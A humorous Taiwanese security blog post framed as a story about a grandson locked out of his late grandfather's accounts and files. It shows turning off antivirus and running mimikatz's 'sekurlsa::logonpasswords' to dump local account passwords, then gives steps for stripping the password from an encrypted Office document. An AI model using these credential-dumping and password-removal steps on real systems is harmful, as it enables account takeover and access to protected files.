iT邦幫忙

2022 iThome 鐵人賽

DAY 16
1
IT管理

資安發大財系列 第 16

[Day15] 阿公留下來的禮物

  • 分享至 

  • xImage
  •  

「太誇張了啦~現在連找貓咪也接哦?」
「接啊~哪次不接?貓咪主人很漂亮捏~~~」
「… 我們是真的在做資安嗎?」
「是啊!我們在情蒐牠主人啊~」
「… 好哦。」

「有個弟弟說他阿公過世了有留禮物給他,但他阿公沒有留下密碼~」
「哦~叫他早點回去洗洗睡,阿公晚上會去跟他說講啦~」
「說好的做資安咧 !!!!!!!!!! 不要只是叫我去路邊找貓咪啦~」
「可是他說他晚上只會夢到女生欸?」
「… … 好啦給他咪咪卡滋啦~」


mimikatz

軟體宣言:此為個人工具,請勿拿來做壞事嘿:)
This is a personal development, please respect its philosophy and don't use it for bad things!

關防毒

https://ithelp.ithome.com.tw/upload/images/20220929/20103647BQVJLymqH4.png

安裝

https://github.com/ParrotSec/mimikatz
https://github.com/gentilkiwi/mimikatz/releases

執行指令如下

mimikatz
privilege::debug
sekurlsa::logonpasswords

取得本機其他帳號密碼

https://ithelp.ithome.com.tw/upload/images/20220929/20103647EeUFQ4od3t.png
耶!一張圖搞定!


「欸那個弟弟又來了,他說他阿公 EXCEL 加密了打不開… 」
https://ithelp.ithome.com.tw/upload/images/20220929/201036477JdrOlCULm.jpg

「這阿公好潮欸~」
「這阿公是不是想要他孫子走資安啊? XDDD」

(以下技能不支援 OFFICE 365 & 端點加密機制)

先將原檔複製起來備份,以免檔案被玩壞掉

將複製檔的副檔名改成 .zip

另外一個空白檔案改成 .zip

https://ithelp.ithome.com.tw/upload/images/20220929/20103647qSVtaIJKwZ.png

將 [Content_Types].xml 拖到加密版本中覆蓋

https://ithelp.ithome.com.tw/upload/images/20220929/20103647Ji6jgX9YRn.png

然後把.zip副檔名再改回來.docx

就變成沒有密碼的格式囉~

來來來~ 一起來看你阿公留給你的禮物是什麼~~~ (期待)

https://ithelp.ithome.com.tw/upload/images/20220929/20103647oqSq5tbSoc.png

「… … … 這阿公真懂玩耶!!!!! XDDDD 」
「破這個 … 這個可能要上 PTT 問了… 」


上一篇
[Day14] 阿姨我不想努力了
下一篇
[Day16] 人可以吃龜飼料嗎
系列文
資安發大財19
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

2 則留言

0
尼克
iT邦大師 1 級 ‧ 2022-10-03 08:41:42

你是鄉民,最後一個梗圖。

虎虎 iT邦研究生 4 級 ‧ 2022-10-03 22:53:34 檢舉

我同事超愛開車 嗚嗚嗚嗚嗚

0
bruce77620
iT邦新手 4 級 ‧ 2023-08-14 15:50:09

您word 的用法 在 word 2013 直接改副檔名 好像無法打開檔案,會出現錯誤

虎虎 iT邦研究生 4 級 ‧ 2023-08-16 17:06:07 檢舉

對~ 太晚上車囉~
這個漏洞微軟後續有更新囉❤

我要留言

立即登入留言